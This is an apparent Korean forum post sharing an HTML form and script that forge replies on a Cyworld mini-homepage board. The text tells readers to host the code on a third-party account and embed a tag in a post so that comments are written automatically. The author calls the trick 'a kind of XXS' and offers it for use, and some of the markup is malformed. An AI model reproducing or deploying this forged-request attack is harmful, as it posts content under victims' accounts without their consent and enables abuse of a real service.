<script>
function timeVal() {
var time = new Date()
var yy = time.getYear()
var mm = time.getMonth() + 1
var dd = time.getDate()
var hour = time.getHours()
var minute = time.getMinutes()
var second = time.getSeconds()
var pos_val = " "
pos_val += yy + " 년" + mm + "월 " + dd + "일" + " " + ((hour > 12) ? (hour - 12) : hour)
pos_val += ((minute < 10) ? ":0" : ":") + minute
pos_val += ((second < 10) ? ":0" : ":") + second
pos_val += (hour >= 12) ? " PM" : " AM"
return pos_val;
}
</script>
<form method="post" action="http://minihp.cyworld.nate.com/pims/board/general/board_replyok.asp" id="form1" name="form1">
<input name="tid" value="xxxxxxxx> //싸이고유넘버 8자리
<input type=hidden name=board_no value=" x="" type="hidden"> //게시판글 속성
<input name="item_seq" value="xxxxxxx" type="hidden"> //게시판글 속성
<input name="cpage" value="x" type="hidden"> //게시판글 속성
<input name="search_type" value="" type="hidden">
<input name="search_keyword" value="" type="hidden">
<input name="domain" value="" type="hidden">
<input name="breply" value="0" type="hidden">
<input name="review_seq" value="" type="hidden">
<input name="content" style="width: 200px;" class="input2" value="" type="text">
</form>
위소스를 제3의 계정에다 올리시고
게시글에 이와같은 테그를 넣어주시면됩니다.
그러면 게시판에 자동적으로 댓글이 작성이됩니다.
일종의 XXS라고할까요.
그냥 도움되실까해서 올려둡니다.^^